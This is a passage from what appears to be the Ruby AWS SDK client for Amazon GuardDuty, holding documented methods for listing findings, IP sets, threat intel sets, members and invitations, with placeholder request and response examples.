# resp.findings[0].service.action.network_connection_action.protocol #=> String
# resp.findings[0].service.action.network_connection_action.local_ip_details.ip_address_v4 #=> String
# resp.findings[0].service.action.network_connection_action.remote_ip_details.city.city_name #=> String
# resp.findings[0].service.action.network_connection_action.remote_ip_details.country.country_code #=> String
# resp.findings[0].service.action.network_connection_action.remote_ip_details.country.country_name #=> String
# resp.findings[0].service.action.network_connection_action.remote_ip_details.geo_location.lat #=> Float
# resp.findings[0].service.action.network_connection_action.remote_ip_details.geo_location.lon #=> Float
# resp.findings[0].service.action.network_connection_action.remote_ip_details.ip_address_v4 #=> String
# resp.findings[0].service.action.network_connection_action.remote_ip_details.organization.asn #=> String
# resp.findings[0].service.action.network_connection_action.remote_ip_details.organization.asn_org #=> String
# resp.findings[0].service.action.network_connection_action.remote_ip_details.organization.isp #=> String
# resp.findings[0].service.action.network_connection_action.remote_ip_details.organization.org #=> String
# resp.findings[0].service.action.network_connection_action.remote_port_details.port #=> Integer
# resp.findings[0].service.action.network_connection_action.remote_port_details.port_name #=> String
# resp.findings[0].service.action.port_probe_action.blocked #=> Boolean
# resp.findings[0].service.action.port_probe_action.port_probe_details #=> Array
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].local_port_details.port #=> Integer
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].local_port_details.port_name #=> String
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].local_ip_details.ip_address_v4 #=> String
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].remote_ip_details.city.city_name #=> String
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].remote_ip_details.country.country_code #=> String
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].remote_ip_details.country.country_name #=> String
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].remote_ip_details.geo_location.lat #=> Float
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].remote_ip_details.geo_location.lon #=> Float
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].remote_ip_details.ip_address_v4 #=> String
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].remote_ip_details.organization.asn #=> String
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].remote_ip_details.organization.asn_org #=> String
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].remote_ip_details.organization.isp #=> String
# resp.findings[0].service.action.port_probe_action.port_probe_details[0].remote_ip_details.organization.org #=> String
# resp.findings[0].service.evidence.threat_intelligence_details #=> Array
# resp.findings[0].service.evidence.threat_intelligence_details[0].threat_list_name #=> String
# resp.findings[0].service.evidence.threat_intelligence_details[0].threat_names #=> Array
# resp.findings[0].service.evidence.threat_intelligence_details[0].threat_names[0] #=> String
# resp.findings[0].service.archived #=> Boolean
# resp.findings[0].service.count #=> Integer
# resp.findings[0].service.detector_id #=> String
# resp.findings[0].service.event_first_seen #=> String
# resp.findings[0].service.event_last_seen #=> String
# resp.findings[0].service.resource_role #=> String
# resp.findings[0].service.service_name #=> String
# resp.findings[0].service.user_feedback #=> String
# resp.findings[0].severity #=> Float
# resp.findings[0].title #=> String
# resp.findings[0].type #=> String
# resp.findings[0].updated_at #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/GetFindings AWS API Documentation
#
# @overload get_findings(params = {})
# @param [Hash] params ({})
def get_findings(params = {}, options = {})
  # Build the GetFindings request and dispatch it in one chained call.
  build_request(:get_findings, params).send_request(options)
end
# Lists Amazon GuardDuty findings statistics for the specified detector
# ID.
#
# @option params [required, String] :detector_id
# The ID of the detector that specifies the GuardDuty service whose
# findings' statistics you want to retrieve.
#
# @option params [required, Array<String>] :finding_statistic_types
# The types of finding statistics to retrieve.
#
# @option params [Types::FindingCriteria] :finding_criteria
# Represents the criteria that is used for querying findings.
#
# @return [Types::GetFindingsStatisticsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetFindingsStatisticsResponse#finding_statistics #finding_statistics} => Types::FindingStatistics
#
# @example Request syntax with placeholder values
#
# resp = client.get_findings_statistics({
# detector_id: "DetectorId", # required
# finding_statistic_types: ["COUNT_BY_SEVERITY"], # required, accepts COUNT_BY_SEVERITY
# finding_criteria: {
# criterion: {
# "String" => {
# eq: ["String"],
# neq: ["String"],
# gt: 1,
# gte: 1,
# lt: 1,
# lte: 1,
# equals: ["String"],
# not_equals: ["String"],
# greater_than: 1,
# greater_than_or_equal: 1,
# less_than: 1,
# less_than_or_equal: 1,
# },
# },
# },
# })
#
# @example Response structure
#
# resp.finding_statistics.count_by_severity #=> Hash
# resp.finding_statistics.count_by_severity["String"] #=> Integer
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/GetFindingsStatistics AWS API Documentation
#
# @overload get_findings_statistics(params = {})
# @param [Hash] params ({})
def get_findings_statistics(params = {}, options = {})
  # Build the GetFindingsStatistics request and dispatch it in one chained call.
  build_request(:get_findings_statistics, params).send_request(options)
end
# Retrieves the IPSet specified by the `ipSetId`.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that the IPSet is associated with.
#
# @option params [required, String] :ip_set_id
# The unique ID of the IPSet to retrieve.
#
# @return [Types::GetIPSetResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetIPSetResponse#name #name} => String
# * {Types::GetIPSetResponse#format #format} => String
# * {Types::GetIPSetResponse#location #location} => String
# * {Types::GetIPSetResponse#status #status} => String
# * {Types::GetIPSetResponse#tags #tags} => Hash<String,String>
#
# @example Request syntax with placeholder values
#
# resp = client.get_ip_set({
# detector_id: "DetectorId", # required
# ip_set_id: "String", # required
# })
#
# @example Response structure
#
# resp.name #=> String
# resp.format #=> String, one of "TXT", "STIX", "OTX_CSV", "ALIEN_VAULT", "PROOF_POINT", "FIRE_EYE"
# resp.location #=> String
# resp.status #=> String, one of "INACTIVE", "ACTIVATING", "ACTIVE", "DEACTIVATING", "ERROR", "DELETE_PENDING", "DELETED"
# resp.tags #=> Hash
# resp.tags["TagKey"] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/GetIPSet AWS API Documentation
#
# @overload get_ip_set(params = {})
# @param [Hash] params ({})
def get_ip_set(params = {}, options = {})
  # Build the GetIPSet request and dispatch it in one chained call.
  build_request(:get_ip_set, params).send_request(options)
end
# Returns the count of all GuardDuty membership invitations that were
# sent to the current member account except the currently accepted
# invitation.
#
# @return [Types::GetInvitationsCountResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetInvitationsCountResponse#invitations_count #invitations_count} => Integer
#
# @example Response structure
#
# resp.invitations_count #=> Integer
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/GetInvitationsCount AWS API Documentation
#
# @overload get_invitations_count(params = {})
# @param [Hash] params ({})
def get_invitations_count(params = {}, options = {})
  # Build the GetInvitationsCount request and dispatch it in one chained call.
  build_request(:get_invitations_count, params).send_request(options)
end
# Provides the details for the GuardDuty master account associated with
# the current GuardDuty member account.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty member account.
#
# @return [Types::GetMasterAccountResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetMasterAccountResponse#master #master} => Types::Master
#
# @example Request syntax with placeholder values
#
# resp = client.get_master_account({
# detector_id: "DetectorId", # required
# })
#
# @example Response structure
#
# resp.master.account_id #=> String
# resp.master.invitation_id #=> String
# resp.master.relationship_status #=> String
# resp.master.invited_at #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/GetMasterAccount AWS API Documentation
#
# @overload get_master_account(params = {})
# @param [Hash] params ({})
def get_master_account(params = {}, options = {})
  # Build the GetMasterAccount request and dispatch it in one chained call.
  build_request(:get_master_account, params).send_request(options)
end
# Retrieves GuardDuty member accounts (to the current GuardDuty master
# account) specified by the account IDs.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty account whose members
# you want to retrieve.
#
# @option params [required, Array<String>] :account_ids
# A list of account IDs of the GuardDuty member accounts that you want
# to describe.
#
# @return [Types::GetMembersResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetMembersResponse#members #members} => Array<Types::Member>
# * {Types::GetMembersResponse#unprocessed_accounts #unprocessed_accounts} => Array<Types::UnprocessedAccount>
#
# @example Request syntax with placeholder values
#
# resp = client.get_members({
# detector_id: "DetectorId", # required
# account_ids: ["AccountId"], # required
# })
#
# @example Response structure
#
# resp.members #=> Array
# resp.members[0].account_id #=> String
# resp.members[0].detector_id #=> String
# resp.members[0].master_id #=> String
# resp.members[0].email #=> String
# resp.members[0].relationship_status #=> String
# resp.members[0].invited_at #=> String
# resp.members[0].updated_at #=> String
# resp.unprocessed_accounts #=> Array
# resp.unprocessed_accounts[0].account_id #=> String
# resp.unprocessed_accounts[0].result #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/GetMembers AWS API Documentation
#
# @overload get_members(params = {})
# @param [Hash] params ({})
def get_members(params = {}, options = {})
  # Build the GetMembers request and dispatch it in one chained call.
  build_request(:get_members, params).send_request(options)
end
# Retrieves the ThreatIntelSet that is specified by the ThreatIntelSet
# ID.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that the threatIntelSet is associated
# with.
#
# @option params [required, String] :threat_intel_set_id
# The unique ID of the threatIntelSet that you want to get.
#
# @return [Types::GetThreatIntelSetResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::GetThreatIntelSetResponse#name #name} => String
# * {Types::GetThreatIntelSetResponse#format #format} => String
# * {Types::GetThreatIntelSetResponse#location #location} => String
# * {Types::GetThreatIntelSetResponse#status #status} => String
# * {Types::GetThreatIntelSetResponse#tags #tags} => Hash<String,String>
#
# @example Request syntax with placeholder values
#
# resp = client.get_threat_intel_set({
# detector_id: "DetectorId", # required
# threat_intel_set_id: "String", # required
# })
#
# @example Response structure
#
# resp.name #=> String
# resp.format #=> String, one of "TXT", "STIX", "OTX_CSV", "ALIEN_VAULT", "PROOF_POINT", "FIRE_EYE"
# resp.location #=> String
# resp.status #=> String, one of "INACTIVE", "ACTIVATING", "ACTIVE", "DEACTIVATING", "ERROR", "DELETE_PENDING", "DELETED"
# resp.tags #=> Hash
# resp.tags["TagKey"] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/GetThreatIntelSet AWS API Documentation
#
# @overload get_threat_intel_set(params = {})
# @param [Hash] params ({})
def get_threat_intel_set(params = {}, options = {})
  # Build the GetThreatIntelSet request and dispatch it in one chained call.
  build_request(:get_threat_intel_set, params).send_request(options)
end
# Invites other AWS accounts (created as members of the current AWS
# account by CreateMembers) to enable GuardDuty, and allow the current
# AWS account to view and manage these accounts' GuardDuty findings on
# their behalf as the master account.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty account that you want
# to invite members with.
#
# @option params [required, Array<String>] :account_ids
# A list of account IDs of the accounts that you want to invite to
# GuardDuty as members.
#
# @option params [Boolean] :disable_email_notification
# A Boolean value that specifies whether you want to disable email
# notification to the accounts that you’re inviting to GuardDuty as
# members.
#
# @option params [String] :message
# The invitation message that you want to send to the accounts that
# you’re inviting to GuardDuty as members.
#
# @return [Types::InviteMembersResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::InviteMembersResponse#unprocessed_accounts #unprocessed_accounts} => Array<Types::UnprocessedAccount>
#
# @example Request syntax with placeholder values
#
# resp = client.invite_members({
# detector_id: "DetectorId", # required
# account_ids: ["AccountId"], # required
# disable_email_notification: false,
# message: "String",
# })
#
# @example Response structure
#
# resp.unprocessed_accounts #=> Array
# resp.unprocessed_accounts[0].account_id #=> String
# resp.unprocessed_accounts[0].result #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/InviteMembers AWS API Documentation
#
# @overload invite_members(params = {})
# @param [Hash] params ({})
def invite_members(params = {}, options = {})
  # Build the InviteMembers request and dispatch it in one chained call.
  build_request(:invite_members, params).send_request(options)
end
# Lists detectorIds of all the existing Amazon GuardDuty detector
# resources.
#
# @option params [Integer] :max_results
# You can use this parameter to indicate the maximum number of items
# that you want in the response. The default value is 50. The maximum
# value is 50.
#
# @option params [String] :next_token
# You can use this parameter when paginating results. Set the value of
# this parameter to null on your first call to the list action. For
# subsequent calls to the action, fill nextToken in the request with the
# value of NextToken from the previous response to continue listing
# data.
#
# @return [Types::ListDetectorsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListDetectorsResponse#detector_ids #detector_ids} => Array<String>
# * {Types::ListDetectorsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_detectors({
# max_results: 1,
# next_token: "String",
# })
#
# @example Response structure
#
# resp.detector_ids #=> Array
# resp.detector_ids[0] #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ListDetectors AWS API Documentation
#
# @overload list_detectors(params = {})
# @param [Hash] params ({})
def list_detectors(params = {}, options = {})
  # Build the ListDetectors request and dispatch it in one chained call.
  build_request(:list_detectors, params).send_request(options)
end
# Returns a paginated list of the current filters.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that the filter is associated with.
#
# @option params [Integer] :max_results
# You can use this parameter to indicate the maximum number of items
# that you want in the response. The default value is 50. The maximum
# value is 50.
#
# @option params [String] :next_token
# You can use this parameter when paginating results. Set the value of
# this parameter to null on your first call to the list action. For
# subsequent calls to the action, fill nextToken in the request with the
# value of NextToken from the previous response to continue listing
# data.
#
# @return [Types::ListFiltersResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListFiltersResponse#filter_names #filter_names} => Array<String>
# * {Types::ListFiltersResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_filters({
# detector_id: "DetectorId", # required
# max_results: 1,
# next_token: "String",
# })
#
# @example Response structure
#
# resp.filter_names #=> Array
# resp.filter_names[0] #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ListFilters AWS API Documentation
#
# @overload list_filters(params = {})
# @param [Hash] params ({})
def list_filters(params = {}, options = {})
  # Build the ListFilters request and dispatch it in one chained call.
  build_request(:list_filters, params).send_request(options)
end
# Lists Amazon GuardDuty findings for the specified detector ID.
#
# @option params [required, String] :detector_id
# The ID of the detector that specifies the GuardDuty service whose
# findings you want to list.
#
# @option params [Types::FindingCriteria] :finding_criteria
# Represents the criteria used for querying findings. Valid values
# include:
#
# * JSON field name
#
# * accountId
#
# * region
#
# * confidence
#
# * id
#
# * resource.accessKeyDetails.accessKeyId
#
# * resource.accessKeyDetails.principalId
#
# * resource.accessKeyDetails.userName
#
# * resource.accessKeyDetails.userType
#
# * resource.instanceDetails.iamInstanceProfile.id
#
# * resource.instanceDetails.imageId
#
# * resource.instanceDetails.instanceId
#
# * resource.instanceDetails.networkInterfaces.ipv6Addresses
#
# * resource.instanceDetails.networkInterfaces.privateIpAddresses.privateIpAddress
#
# * resource.instanceDetails.networkInterfaces.publicDnsName
#
# * resource.instanceDetails.networkInterfaces.publicIp
#
# * resource.instanceDetails.networkInterfaces.securityGroups.groupId
#
# * resource.instanceDetails.networkInterfaces.securityGroups.groupName
#
# * resource.instanceDetails.networkInterfaces.subnetId
#
# * resource.instanceDetails.networkInterfaces.vpcId
#
# * resource.instanceDetails.tags.key
#
# * resource.instanceDetails.tags.value
#
# * resource.resourceType
#
# * service.action.actionType
#
# * service.action.awsApiCallAction.api
#
# * service.action.awsApiCallAction.callerType
#
# * service.action.awsApiCallAction.remoteIpDetails.city.cityName
#
# * service.action.awsApiCallAction.remoteIpDetails.country.countryName
#
# * service.action.awsApiCallAction.remoteIpDetails.ipAddressV4
#
# * service.action.awsApiCallAction.remoteIpDetails.organization.asn
#
# * service.action.awsApiCallAction.remoteIpDetails.organization.asnOrg
#
# * service.action.awsApiCallAction.serviceName
#
# * service.action.dnsRequestAction.domain
#
# * service.action.networkConnectionAction.blocked
#
# * service.action.networkConnectionAction.connectionDirection
#
# * service.action.networkConnectionAction.localPortDetails.port
#
# * service.action.networkConnectionAction.protocol
#
# * service.action.networkConnectionAction.remoteIpDetails.city.cityName
#
# * service.action.networkConnectionAction.remoteIpDetails.country.countryName
#
# * service.action.networkConnectionAction.remoteIpDetails.ipAddressV4
#
# * service.action.networkConnectionAction.remoteIpDetails.organization.asn
#
# * service.action.networkConnectionAction.remoteIpDetails.organization.asnOrg
#
# * service.action.networkConnectionAction.remotePortDetails.port
#
# * service.additionalInfo.threatListName
#
# * service.archived
#
# When this attribute is set to 'true', only archived findings are
# listed. When it's set to 'false', only unarchived findings are
# listed. When this attribute is not set, all existing findings are
# listed.
#
# * service.resourceRole
#
# * severity
#
# * type
#
# * updatedAt
#
# Type: Timestamp in Unix Epoch millisecond format: 1486685375000
#
# @option params [Types::SortCriteria] :sort_criteria
# Represents the criteria used for sorting findings.
#
# @option params [Integer] :max_results
# You can use this parameter to indicate the maximum number of items you
# want in the response. The default value is 50. The maximum value is
# 50.
#
# @option params [String] :next_token
# You can use this parameter when paginating results. Set the value of
# this parameter to null on your first call to the list action. For
# subsequent calls to the action, fill nextToken in the request with the
# value of NextToken from the previous response to continue listing
# data.
#
# @return [Types::ListFindingsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListFindingsResponse#finding_ids #finding_ids} => Array<String>
# * {Types::ListFindingsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_findings({
# detector_id: "DetectorId", # required
# finding_criteria: {
# criterion: {
# "String" => {
# eq: ["String"],
# neq: ["String"],
# gt: 1,
# gte: 1,
# lt: 1,
# lte: 1,
# equals: ["String"],
# not_equals: ["String"],
# greater_than: 1,
# greater_than_or_equal: 1,
# less_than: 1,
# less_than_or_equal: 1,
# },
# },
# },
# sort_criteria: {
# attribute_name: "String",
# order_by: "ASC", # accepts ASC, DESC
# },
# max_results: 1,
# next_token: "String",
# })
#
# @example Response structure
#
# resp.finding_ids #=> Array
# resp.finding_ids[0] #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ListFindings AWS API Documentation
#
# @overload list_findings(params = {})
# @param [Hash] params ({})
def list_findings(params = {}, options = {})
  # Build the operation request and dispatch it with any per-call options.
  build_request(:list_findings, params).send_request(options)
end
# Lists the IPSets of the GuardDuty service specified by the detector
# ID. If you use this operation from a member account, the IPSets
# returned are the IPSets from the associated master account.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that the IPSet is associated with.
#
# @option params [Integer] :max_results
# You can use this parameter to indicate the maximum number of items you
# want in the response. The default value is 50. The maximum value is
# 50.
#
# @option params [String] :next_token
# You can use this parameter when paginating results. Set the value of
# this parameter to null on your first call to the list action. For
# subsequent calls to the action, fill nextToken in the request with the
# value of NextToken from the previous response to continue listing
# data.
#
# @return [Types::ListIPSetsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListIPSetsResponse#ip_set_ids #ip_set_ids} => Array<String>
# * {Types::ListIPSetsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_ip_sets({
# detector_id: "DetectorId", # required
# max_results: 1,
# next_token: "String",
# })
#
# @example Response structure
#
# resp.ip_set_ids #=> Array
# resp.ip_set_ids[0] #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ListIPSets AWS API Documentation
#
# @overload list_ip_sets(params = {})
# @param [Hash] params ({})
def list_ip_sets(params = {}, options = {})
  # Build the operation request and dispatch it with any per-call options.
  build_request(:list_ip_sets, params).send_request(options)
end
# Lists all GuardDuty membership invitations that were sent to the
# current AWS account.
#
# @option params [Integer] :max_results
# You can use this parameter to indicate the maximum number of items
# that you want in the response. The default value is 50. The maximum
# value is 50.
#
# @option params [String] :next_token
# You can use this parameter when paginating results. Set the value of
# this parameter to null on your first call to the list action. For
# subsequent calls to the action, fill nextToken in the request with the
# value of NextToken from the previous response to continue listing
# data.
#
# @return [Types::ListInvitationsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListInvitationsResponse#invitations #invitations} => Array<Types::Invitation>
# * {Types::ListInvitationsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_invitations({
# max_results: 1,
# next_token: "String",
# })
#
# @example Response structure
#
# resp.invitations #=> Array
# resp.invitations[0].account_id #=> String
# resp.invitations[0].invitation_id #=> String
# resp.invitations[0].relationship_status #=> String
# resp.invitations[0].invited_at #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ListInvitations AWS API Documentation
#
# @overload list_invitations(params = {})
# @param [Hash] params ({})
def list_invitations(params = {}, options = {})
  # Build the operation request and dispatch it with any per-call options.
  build_request(:list_invitations, params).send_request(options)
end
# Lists details about all member accounts for the current GuardDuty
# master account.
#
# @option params [required, String] :detector_id
# The unique ID of the detector the member is associated with.
#
# @option params [Integer] :max_results
# You can use this parameter to indicate the maximum number of items you
# want in the response. The default value is 50. The maximum value is
# 50.
#
# @option params [String] :next_token
# You can use this parameter when paginating results. Set the value of
# this parameter to null on your first call to the list action. For
# subsequent calls to the action, fill nextToken in the request with the
# value of NextToken from the previous response to continue listing
# data.
#
# @option params [String] :only_associated
# Specifies whether to only return associated members or to return all
# members (including members who haven't been invited yet or have been
# disassociated).
#
# @return [Types::ListMembersResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListMembersResponse#members #members} => Array<Types::Member>
# * {Types::ListMembersResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_members({
# detector_id: "DetectorId", # required
# max_results: 1,
# next_token: "String",
# only_associated: "String",
# })
#
# @example Response structure
#
# resp.members #=> Array
# resp.members[0].account_id #=> String
# resp.members[0].detector_id #=> String
# resp.members[0].master_id #=> String
# resp.members[0].email #=> String
# resp.members[0].relationship_status #=> String
# resp.members[0].invited_at #=> String
# resp.members[0].updated_at #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ListMembers AWS API Documentation
#
# @overload list_members(params = {})
# @param [Hash] params ({})
def list_members(params = {}, options = {})
  # Build the operation request and dispatch it with any per-call options.
  build_request(:list_members, params).send_request(options)
end
# Lists the accounts configured as GuardDuty delegated administrators.
#
# @option params [Integer] :max_results
# The maximum number of results to return in the response.
#
# @option params [String] :next_token
# A token to use for paginating results that are returned in the
# response. Set the value of this parameter to null for the first
# request to a list action. For subsequent calls, use the `NextToken`
# value returned from the previous request to continue listing results
# after the first page.
#
# @return [Types::ListOrganizationAdminAccountsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListOrganizationAdminAccountsResponse#admin_accounts #admin_accounts} => Array<Types::AdminAccount>
# * {Types::ListOrganizationAdminAccountsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_organization_admin_accounts({
# max_results: 1,
# next_token: "String",
# })
#
# @example Response structure
#
# resp.admin_accounts #=> Array
# resp.admin_accounts[0].admin_account_id #=> String
# resp.admin_accounts[0].admin_status #=> String, one of "ENABLED", "DISABLE_IN_PROGRESS"
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ListOrganizationAdminAccounts AWS API Documentation
#
# @overload list_organization_admin_accounts(params = {})
# @param [Hash] params ({})
def list_organization_admin_accounts(params = {}, options = {})
  # Build the operation request and dispatch it with any per-call options.
  build_request(:list_organization_admin_accounts, params).send_request(options)
end
# Returns a list of publishing destinations associated with the
# specified `dectectorId`.
#
# @option params [required, String] :detector_id
# The ID of the detector to retrieve publishing destinations for.
#
# @option params [Integer] :max_results
# The maximum number of results to return in the response.
#
# @option params [String] :next_token
# A token to use for paginating results that are returned in the
# response. Set the value of this parameter to null for the first
# request to a list action. For subsequent calls, use the `NextToken`
# value returned from the previous request to continue listing results
# after the first page.
#
# @return [Types::ListPublishingDestinationsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListPublishingDestinationsResponse#destinations #destinations} => Array<Types::Destination>
# * {Types::ListPublishingDestinationsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_publishing_destinations({
# detector_id: "DetectorId", # required
# max_results: 1,
# next_token: "String",
# })
#
# @example Response structure
#
# resp.destinations #=> Array
# resp.destinations[0].destination_id #=> String
# resp.destinations[0].destination_type #=> String, one of "S3"
# resp.destinations[0].status #=> String, one of "PENDING_VERIFICATION", "PUBLISHING", "UNABLE_TO_PUBLISH_FIX_DESTINATION_PROPERTY", "STOPPED"
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ListPublishingDestinations AWS API Documentation
#
# @overload list_publishing_destinations(params = {})
# @param [Hash] params ({})
def list_publishing_destinations(params = {}, options = {})
  # Build the operation request and dispatch it with any per-call options.
  build_request(:list_publishing_destinations, params).send_request(options)
end
# Lists tags for a resource. Tagging is currently supported for
# detectors, finding filters, IP sets, and threat intel sets, with a
# limit of 50 tags per resource. When invoked, this operation returns
# all assigned tags for a given resource.
#
# @option params [required, String] :resource_arn
# The Amazon Resource Name (ARN) for the given GuardDuty resource.
#
# @return [Types::ListTagsForResourceResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListTagsForResourceResponse#tags #tags} => Hash<String,String>
#
# @example Request syntax with placeholder values
#
# resp = client.list_tags_for_resource({
# resource_arn: "GuardDutyArn", # required
# })
#
# @example Response structure
#
# resp.tags #=> Hash
# resp.tags["TagKey"] #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ListTagsForResource AWS API Documentation
#
# @overload list_tags_for_resource(params = {})
# @param [Hash] params ({})
def list_tags_for_resource(params = {}, options = {})
  # Build the operation request and dispatch it with any per-call options.
  build_request(:list_tags_for_resource, params).send_request(options)
end
# Lists the ThreatIntelSets of the GuardDuty service specified by the
# detector ID. If you use this operation from a member account, the
# ThreatIntelSets associated with the master account are returned.
#
# @option params [required, String] :detector_id
# The unique ID of the detector that the threatIntelSet is associated
# with.
#
# @option params [Integer] :max_results
# You can use this parameter to indicate the maximum number of items
# that you want in the response. The default value is 50. The maximum
# value is 50.
#
# @option params [String] :next_token
# You can use this parameter to paginate results in the response. Set
# the value of this parameter to null on your first call to the list
# action. For subsequent calls to the action, fill nextToken in the
# request with the value of NextToken from the previous response to
# continue listing data.
#
# @return [Types::ListThreatIntelSetsResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::ListThreatIntelSetsResponse#threat_intel_set_ids #threat_intel_set_ids} => Array<String>
# * {Types::ListThreatIntelSetsResponse#next_token #next_token} => String
#
# The returned {Seahorse::Client::Response response} is a pageable response and is Enumerable. For details on usage see {Aws::PageableResponse PageableResponse}.
#
# @example Request syntax with placeholder values
#
# resp = client.list_threat_intel_sets({
# detector_id: "DetectorId", # required
# max_results: 1,
# next_token: "String",
# })
#
# @example Response structure
#
# resp.threat_intel_set_ids #=> Array
# resp.threat_intel_set_ids[0] #=> String
# resp.next_token #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/ListThreatIntelSets AWS API Documentation
#
# @overload list_threat_intel_sets(params = {})
# @param [Hash] params ({})
def list_threat_intel_sets(params = {}, options = {})
  # Build the operation request and dispatch it with any per-call options.
  build_request(:list_threat_intel_sets, params).send_request(options)
end
# Turns on GuardDuty monitoring of the specified member accounts. Use
# this operation to restart monitoring of accounts that you stopped
# monitoring with the `StopMonitoringMembers` operation.
#
# @option params [required, String] :detector_id
# The unique ID of the detector of the GuardDuty master account
# associated with the member accounts to monitor.
#
# @option params [required, Array<String>] :account_ids
# A list of account IDs of the GuardDuty member accounts to start
# monitoring.
#
# @return [Types::StartMonitoringMembersResponse] Returns a {Seahorse::Client::Response response} object which responds to the following methods:
#
# * {Types::StartMonitoringMembersResponse#unprocessed_accounts #unprocessed_accounts} => Array<Types::UnprocessedAccount>
#
# @example Request syntax with placeholder values
#
# resp = client.start_monitoring_members({
# detector_id: "DetectorId", # required
# account_ids: ["AccountId"], # required
# })
#
# @example Response structure
#
# resp.unprocessed_accounts #=> Array
# resp.unprocessed_accounts[0].account_id #=> String
# resp.unprocessed_accounts[0].result #=> String
#
# @see http://docs.aws.amazon.com/goto/WebAPI/guardduty-2017-11-28/StartMonitoringMembers AWS API Documentation
#
